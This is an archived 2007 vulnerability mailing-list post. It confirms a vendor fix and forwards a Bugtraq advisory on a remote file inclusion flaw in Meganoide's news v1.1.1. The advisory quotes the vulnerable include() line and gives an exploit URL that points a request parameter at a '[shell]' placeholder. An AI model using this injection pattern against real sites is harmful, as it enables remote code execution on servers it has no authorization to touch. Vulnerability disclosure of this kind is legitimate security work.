[VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities
Noam Rathaus
noamr at beyondsecurity.com
Tue Feb 20 05:07:11 EST 2007
Hi,
Vendor appears to confirm problem:
----------------------
Meganoide's news v1.1.2
-----------------------
- Bug: possibile inclusione di file remoti nel file "include.php"
(Translation from italian: possible inclusion of files remotely in the
file "include.php")
---------- Forwarded Message ----------
Subject: Meganoide's news v1.1.1 < = RFi Vulnerabilities
Date: Friday 16 February 2007 19:54
From: k4rtal at gmail.com
To: bugtraq at securityfocus.com
##################################################################
#Meganoide's news v1.1.1 < = RFi Vulnerabilities
#
#Download :
http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111 #
#Script Name : Meganoide's news v1.1.1
#
#
##################################################################
#
#Coded By : KaRTaL
#
#
#Contact : k4rtal[at]gmail[dot]com
#
#
##################################################################
#
#V.Code in : [path]/include.php
#
#
# include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php");
#
#
#Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
#
#
##################################################################
#
#
#Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa ,
Gurkan142 , www.istikla-team.org #
#
#
#
##################################################################
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list